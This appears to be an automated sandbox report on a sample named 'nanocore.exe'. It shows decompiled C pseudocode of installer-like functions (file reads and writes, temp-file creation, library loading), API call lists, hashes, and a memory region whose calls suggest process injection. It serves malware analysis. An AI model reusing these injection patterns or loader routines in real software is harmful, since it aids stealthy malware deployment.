            C-Code - Quality: 95%
            			E00402EBD(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
            				struct _OVERLAPPED* _v8;
            				long _v12;
            				void* _v16;
            				long _v20;
            				long _v24;
            				intOrPtr _v28;
            				char _v92;
            				void* _t68;
            				void* _t69;
            				int _t74;
            				long _t75;
            				intOrPtr _t79;
            				long _t80;
            				void* _t82;
            				int _t84;
            				void* _t99;
            				void* _t100;
            				long _t101;
            				int _t102;
            				long _t103;
            				int _t104;
            				intOrPtr _t105;
            				long _t106;
            				void* _t107;
            
            				_t102 = _a16;
            				_t99 = _a12;
            				_v12 = _t102;
            				if(_t99 == 0) {
            					_v12 = 0x8000;
            				}
            				_v8 = 0;
            				_v16 = _t99;
            				if(_t99 == 0) {
            					_v16 = 0x78d938;
            				}
            				_t66 = _a4;
            				if(_a4 >= 0) {
            					E004030FF( *0x7a2fd8 + _t66);
            				}
            				_t68 = E004030CD( &_a16, 4); // executed
            				if(_t68 == 0) {
            					L44:
            					_push(0xfffffffd);
            					goto L45;
            				} else {
            					if((_a19 & 0x00000080) == 0) {
            						if(_t99 != 0) {
            							if(_a16 < _t102) {
            								_t102 = _a16;
            							}
            							if(E004030CD(_t99, _t102) != 0) {
            								_v8 = _t102;
            								L47:
            								return _v8;
            							} else {
            								goto L44;
            							}
            						}
            						if(_a16 <= 0) {
            							goto L47;
            						}
            						while(1) {
            							_t103 = _v12;
            							if(_a16 < _t103) {
            								_t103 = _a16;
            							}
            							if(E004030CD(0x789938, _t103) == 0) {
            								goto L44;
            							}
            							_t74 = WriteFile(_a8, 0x789938, _t103,  &_a12, 0); // executed
            							if(_t74 == 0 || _t103 != _a12) {
            								L30:
            								_push(0xfffffffe);
            								L45:
            								_pop(_t69);
            								return _t69;
            							} else {
            								_v8 = _v8 + _t103;
            								_a16 = _a16 - _t103;
            								if(_a16 > 0) {
            									continue;
            								}
            								goto L47;
            							}
            						}
            						goto L44;
            					}
            					_t75 = GetTickCount();
            					_t13 =  &_a16;
            					 *_t13 = _a16 & 0x7fffffff;
            					_v20 = _t75;
            					 *0x40b038 = 0xb;
            					 *0x40b050 = 0;
            					_a4 = _a16;
            					if( *_t13 <= 0) {
            						goto L47;
            					}
            					while(1) {
            						L10:
            						_t104 = 0x4000;
            						if(_a16 < 0x4000) {
            							_t104 = _a16;
            						}
            						if(E004030CD(0x789938, _t104) == 0) {
            							goto L44;
            						}
            						_a16 = _a16 - _t104;
            						 *0x40b028 = 0x789938;
            						 *0x40b02c = _t104;
            						while(1) {
            							_t100 = _v16;
            							 *0x40b030 = _t100;
            							 *0x40b034 = _v12;
            							_t79 = E00405D9D(0x40b028);
            							_v28 = _t79;
            							if(_t79 < 0) {
            								break;
            							}
            							_t105 =  *0x40b030; // 0x78ed38
            							_t106 = _t105 - _t100;
            							_t80 = GetTickCount();
            							_t101 = _t80;
            							if(( *0x4092a0 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
            								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
            								_t107 = _t107 + 0xc;
            								E00404D62(0,  &_v92);
            								_v20 = _t101;
            							}
            							if(_t106 == 0) {
            								if(_a16 > 0) {
            									goto L10;
            								}
            								goto L47;
            							} else {
            								if(_a12 != 0) {
            									_v12 = _v12 - _t106;
            									_v8 = _v8 + _t106;
            									_t82 =  *0x40b030; // 0x78ed38
            									_v16 = _t82;
            									if(_v12 < 1) {
            										goto L47;
            									}
            									L25:
            									if(_v28 != 4) {
            										continue;
            									}
            									goto L47;
            								}
            								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
            								if(_t84 == 0 || _v24 != _t106) {
            									goto L30;
            								} else {
            									_v8 = _v8 + _t106;
            									goto L25;
            								}
            							}
            						}
            						_push(0xfffffffc);
            						goto L45;
            					}
            					goto L44;
            				}
            			}

            Instruction address column for E00402EBD (per-line alignment lost): 0x00402ec5 to 0x004030c3

            APIs
            • GetTickCount.KERNEL32 ref: 00402F1F
            • GetTickCount.KERNEL32 ref: 00402FA6
            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000000), ref: 00402FD3
            • wsprintfA.USER32 ref: 00402FE3
            • WriteFile.KERNELBASE(00000000,00000000,0078ED38,7FFFFFFF,00000000), ref: 00403011
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CountTick$FileWritewsprintf
            • String ID: ... %d%%$8x
            • API String ID: 4209647438-795837185
            • Opcode ID: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
            • Instruction ID: 8577ea5e15ae9603690e1c5729624cd70e3502ed31cd2bd6b1ef147789401905
            • Opcode Fuzzy Hash: 200e9f51f80e72fe4fcb6a06ea592b3ad35ad2676aa37a9b98c0ec53b28c93f4
            • Instruction Fuzzy Hash: 9E61AB3191220AEBCF10DF65DA48A9F7BB8EB04755F10417BF911B32C0D3789A40CBAA
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02CB1520
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02CB157F
            Strings
            Memory Dump Source
            • Source File: 00000008.00000002.669618724.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: AllocCreateFileVirtual
            • String ID: b1a2f4be1bb040dfae4382b4765a8fb2
            • API String ID: 1475775534-2543734446
            • Opcode ID: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction ID: bf149401fb7660f5dc6fb3a2d0fd73a4d39376053a2a554119c0ce443599f169
            • Opcode Fuzzy Hash: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction Fuzzy Hash: A9E16931E44388EDEF21CBE4EC15BEDBBB5AF04710F14409AE608FA191D7B50A85DB16
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02CB081B
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02CB09E8
            Memory Dump Source
            • Source File: 00000008.00000002.669618724.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction ID: 300171d7ec85151e9a4f5608d859f949f46ca87c86e6865e1f40e4c4e8d61333
            • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction Fuzzy Hash: 41A1FE34D00249EFEF12CFE4D885BEEBBB1AF18316F20845AE515BA2A0D7755A81DF10
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E00401FDC(int __ebx) {
            				struct HINSTANCE__* _t20;
            				struct HINSTANCE__* _t27;
            				int _t28;
            				struct HINSTANCE__* _t33;
            				CHAR* _t35;
            				intOrPtr* _t36;
            				void* _t37;
            
            				_t28 = __ebx;
            				 *(_t37 - 4) = 1;
            				SetErrorMode(0x8001); // executed
            				if( *0x7a3030 < __ebx) {
            					_push(0xffffffe7);
            					goto L14;
            				} else {
            					_t35 = E00402A9A(0xfffffff0);
            					 *(_t37 + 8) = E00402A9A(1);
            					if( *((intOrPtr*)(_t37 - 0x14)) == __ebx) {
            						L3:
            						_t20 = LoadLibraryA(_t35); // executed
            						_t33 = _t20;
            						if(_t33 == _t28) {
            							_push(0xfffffff6);
            							L14:
            							E00401428();
            						} else {
            							goto L4;
            						}
            					} else {
            						_t27 = GetModuleHandleA(_t35); // executed
            						_t33 = _t27;
            						if(_t33 != __ebx) {
            							L4:
            							_t36 = GetProcAddress(_t33,  *(_t37 + 8));
            							if(_t36 == _t28) {
            								E00404D62(0xfffffff7,  *(_t37 + 8));
            							} else {
            								 *(_t37 - 4) = _t28;
            								if( *((intOrPtr*)(_t37 - 0x1c)) == _t28) {
            									 *_t36( *((intOrPtr*)(_t37 - 8)), 0x400, 0x7a4000, 0x40b018, 0x409000); // executed
            								} else {
            									E00401428( *((intOrPtr*)(_t37 - 0x1c)));
            									if( *_t36() != 0) {
            										 *(_t37 - 4) = 1;
            									}
            								}
            							}
            							if( *((intOrPtr*)(_t37 - 0x18)) == _t28) {
            								FreeLibrary(_t33);
            							}
            						} else {
            							goto L3;
            						}
            					}
            				}
            				SetErrorMode(_t28);
            				 *0x7a3008 =  *0x7a3008 +  *(_t37 - 4);
            				return 0;
            			}


            APIs
            • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
            • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
              • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
              • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
              • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
              • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
            • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
            • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
            • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
            • SetErrorMode.KERNEL32 ref: 0040209B
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
            • String ID:
            • API String ID: 1609199483-0
            • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
            • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
            • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
            • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E004015D5(struct _SECURITY_ATTRIBUTES* __ebx, void* __eflags) {
            				int _t19;
            				struct _SECURITY_ATTRIBUTES* _t20;
            				signed char _t22;
            				struct _SECURITY_ATTRIBUTES* _t23;
            				CHAR* _t25;
            				struct _SECURITY_ATTRIBUTES** _t27;
            				struct _SECURITY_ATTRIBUTES** _t29;
            				void* _t30;
            
            				_t23 = __ebx;
            				_t25 = E00402A9A(0xfffffff0);
            				_t27 = E0040555F(_t25);
            				if( *_t25 != __ebx && _t27 != __ebx) {
            					do {
            						_t29 = E004054F7(_t27, 0x5c);
            						 *_t29 = _t23;
            						 *((char*)(_t30 + 0xb)) =  *_t29;
            						_t19 = CreateDirectoryA(_t25, _t23); // executed
            						if(_t19 == 0) {
            							if(GetLastError() != 0xb7) {
            								L5:
            								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
            							} else {
            								_t22 = GetFileAttributesA(_t25); // executed
            								if((_t22 & 0x00000010) == 0) {
            									goto L5;
            								}
            							}
            						}
            						_t20 =  *((intOrPtr*)(_t30 + 0xb));
            						 *_t29 = _t20;
            						_t27 =  &(_t29[0]);
            					} while (_t20 != _t23);
            				}
            				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
            					_push(0xfffffff5);
            					E00401428();
            				} else {
            					E00401428(0xffffffe6);
            					E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
            					SetCurrentDirectoryA(_t25); // executed
            				}
            				 *0x7a3008 =  *0x7a3008 +  *((intOrPtr*)(_t30 - 4));
            				return 0;
            			}


            APIs
              • Part of subcall function 0040555F: CharNextA.USER32(00405315,?,007A0988,C:\Users\user\AppData\Local\Temp\,004055C3,007A0988,007A0988,?,?,00000000,00405315,?,C:\Users\user\Desktop\nanocore.exe 0,00000000), ref: 0040556D
              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405572
              • Part of subcall function 0040555F: CharNextA.USER32(00000000), ref: 00405581
            • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401601
            • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 0040160B
            • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 00401619
            • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401648
            Strings
            • C:\Users\user\AppData\Local\Temp, xrefs: 0040163D
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
            • String ID: C:\Users\user\AppData\Local\Temp
            • API String ID: 3751793516-47812868
            • Opcode ID: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
            • Instruction ID: 09f96d0d66b1181939c381e70bae2dcc986a56c468c5fc90a5c01fc4095c1b0e
            • Opcode Fuzzy Hash: 8ad83ee49b934180a65c3f1f2490f938aa5d6732355b324bf936fc1135f131d3
            • Instruction Fuzzy Hash: B2010831908181ABDB212F695D449BF7BB0DA52364B28463BF8D1B22E2C63C4946D63E
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004056BF(char _a4, intOrPtr _a6, CHAR* _a8) {
            				signed int _t11;
            				int _t14;
            				signed int _t16;
            				void* _t19;
            				CHAR* _t20;
            
            				_t20 = _a4;
            				_t19 = 0x64;
            				while(1) {
            					_t19 = _t19 - 1;
            					_a4 = 0x61736e;
            					_t11 = GetTickCount();
            					_t16 = 0x1a;
            					_a6 = _a6 + _t11 % _t16;
            					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
            					if(_t14 != 0) {
            						break;
            					}
            					if(_t19 != 0) {
            						continue;
            					}
            					 *_t20 =  *_t20 & 0x00000000;
            					return _t14;
            				}
            				return _t20;
            			}


            APIs
            • GetTickCount.KERNEL32 ref: 004056D2
            • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?,?,C:\Users\user\AppData\Local\Temp\,Error writing temporary file. Make sure your temp folder is valid.,00403148,C:\Users\user\Desktop\nanocore.exe 0,C:\Users\user\AppData\Local\Temp\), ref: 004056EC
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004056C2
            • nsa, xrefs: 004056CB
            • Error writing temporary file. Make sure your temp folder is valid., xrefs: 004056BF
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: CountFileNameTempTick
            • String ID: C:\Users\user\AppData\Local\Temp\$Error writing temporary file. Make sure your temp folder is valid.$nsa
            • API String ID: 1716503409-3657371456
            • Opcode ID: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
            • Instruction ID: fc1e422234f16816b4991f84e515e98fc6b5cd585f65b5bef5412ac6235d785f
            • Opcode Fuzzy Hash: 1576e13395d2aa45966e3556d2b1d116b7b8b6eb636277a79ea70ab438a8cab6
            • Instruction Fuzzy Hash: F1F0A036748218BAE7104E55EC04B9B7FA9DF91760F14C02BFA089A1C0D6B1A95897A9
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 02CB0387
            • GetThreadContext.KERNELBASE(?,00010007), ref: 02CB03AA
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02CB03CE
            Memory Dump Source
            • Source File: 00000008.00000002.669618724.0000000002CB0000.00000040.00000001.sdmp, Offset: 02CB0000, based on PE: false
            Similarity
            • API ID: Process$ContextCreateMemoryReadThread
            • String ID:
            • API String ID: 2411489757-0
            • Opcode ID: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction ID: 01d20345cfe282516aa3efc90a2496fdb251b9222e4999a0c22c2eee8a04846a
            • Opcode Fuzzy Hash: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction Fuzzy Hash: 06321731E40258EFEB21CBA4DC55BEEB7B5BF48705F20409AE608FA2A0D7705A85DF15
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 73%
            			E0040136D(signed int _a4) {
            				intOrPtr* _t8;
            				int _t10;
            				signed int _t12;
            				int _t13;
            				int _t14;
            				signed int _t21;
            				int _t24;
            				signed int _t27;
            				void* _t28;
            
            				_t27 = _a4;
            				while(_t27 >= 0) {
            					_t8 = _t27 * 0x1c +  *0x7a2fb0;
            					__eflags =  *_t8 - 1;
            					if( *_t8 == 1) {
            						break;
            					}
            					_push(_t8); // executed
            					_t10 = E00401439(); // executed
            					__eflags = _t10 - 0x7fffffff;
            					if(_t10 == 0x7fffffff) {
            						return 0x7fffffff;
            					}
            					__eflags = _t10;
            					if(__eflags < 0) {
            						_t10 = E00405936(0x7a4000 - (_t10 + 1 << 0xa), 0x7a4000);
            						__eflags = _t10;
            					}
            					if(__eflags != 0) {
            						_t12 = _t10 - 1;
            						_t21 = _t27;
            						_t27 = _t12;
            						_t13 = _t12 - _t21;
            						__eflags = _t13;
            					} else {
            						_t13 = 1;
            						_t27 = _t27 + 1;
            					}
            					__eflags =  *(_t28 + 0xc);
            					if( *(_t28 + 0xc) != 0) {
            						 *0x7a276c =  *0x7a276c + _t13;
            						_t14 =  *0x7a2754;
            						__eflags = _t14;
            						_t24 = (0 | _t14 == 0x00000000) + _t14;
            						__eflags = _t24;
            						SendMessageA( *(_t28 + 0x18), 0x402, MulDiv( *0x7a276c, 0x7530, _t24), 0);
            					}
            				}
            				return 0;
            			}


            APIs
            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E5
            • SendMessageA.USER32(00000402,00000402,00000000), ref: 004013F5
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: MessageSend
            • String ID: 4@
            • API String ID: 3850602802-2385517874
            • Opcode ID: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
            • Instruction ID: c77d45609a211084429c3166b5231f0613d514cab4ec9a945a8c79bb8836a1de
            • Opcode Fuzzy Hash: a45d14e2091946de284817cfc568e15438f589f3a87ce7b3a313abe01bff308b
            • Instruction Fuzzy Hash: 9201DE726242109FE7184B39DD09B3B36D8E791314F00823EBA52E66F1E67CDC028B49
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E00403116(void* __eflags) {
            				void* _t2;
            				void* _t5;
            				CHAR* _t6;
            
            				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
            				E00405BFB(_t6);
            				_t2 = E00405538(_t6);
            				if(_t2 != 0) {
            					E004054CC(_t6);
            					CreateDirectoryA(_t6, 0); // executed
            					_t5 = E004056BF("C:\\Users\\jones\\Desktop\\nanocore.exe 0", _t6); // executed
            					return _t5;
            				} else {
            					return _t2;
            				}
            			}


            APIs
              • Part of subcall function 00405BFB: CharNextA.USER32(?,*?|<>/":,00000000,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C53
              • Part of subcall function 00405BFB: CharNextA.USER32(?,?,?,00000000,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C60
              • Part of subcall function 00405BFB: CharNextA.USER32(?,Error writing temporary file. Make sure your temp folder is valid.,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C65
              • Part of subcall function 00405BFB: CharPrevA.USER32(?,?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403122,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00405C75
            • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: Char$Next$CreateDirectoryPrev
            • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop\nanocore.exe 0
            • API String ID: 4115351271-1059026561
            • Opcode ID: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
            • Instruction ID: 6026620382323fd49234fcc764212d1b2eb381da62286567b3783a1d3151fd3a
            • Opcode Fuzzy Hash: 522d963e3f3a4f438d732b49ef20f3582027ff3f63ea88c6e0be8bfaf4fc7fbc
            • Instruction Fuzzy Hash: 41D0A92100BD3130C581322A3C06FCF091C8F8732AB00413BF80DB40C24B6C2A828AFE
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00405690(CHAR* _a4, long _a8, long _a12) {
            				signed int _t5;
            				void* _t6;
            
            				_t5 = GetFileAttributesA(_a4); // executed
            				asm("sbb ecx, ecx");
            				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
            				return _t6;
            			}


            APIs
            • GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
            Memory Dump Source
            • Source File: 00000008.00000002.667474127.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000008.00000002.667465971.0000000000400000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667564878.0000000000407000.00000002.00020000.sdmp
            • Associated: 00000008.00000002.667600057.0000000000409000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667656629.000000000077A000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667673238.0000000000784000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667696272.0000000000788000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667771912.0000000000795000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667801908.00000000007A1000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667819676.00000000007A9000.00000004.00020000.sdmp
            • Associated: 00000008.00000002.667833230.00000000007AC000.00000002.00020000.sdmp
            Similarity
            • API ID: File$AttributesCreate
            • String ID:
            • API String ID: 415043291-0
            • Opcode ID: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
            • Instruction ID: fda52db4846bf436787418750c042d71830ab65c4a714c5a55a7f97c147c79cf
            • Opcode Fuzzy Hash: c0d98c849f492b5a4774d0bea3b1d3ff5b36842139f7d17fd49bb2e6aa7f869d
            • Instruction Fuzzy Hash: 3BD09E71658301AFEF098F20DE16F2E7AA2EB84B01F10562CFA82940E0D6755C159B16
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E004030CD(void* _a4, long _a8) {
            				int _t6;
            				long _t10;
            
            				_t10 = _a8;
            				_t6 = ReadFile( *0x409020, _a4, _t10,  &_a8, 0); // executed
            				if(_t6 == 0 || _a8 != _t10) {
            					return 0;
            				} else {
            					return 1;
            				}
            			}


            APIs
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F0D,000000FF,00000004,00000000,00000000,00000000), ref: 004030E4
            Memory Dump Source
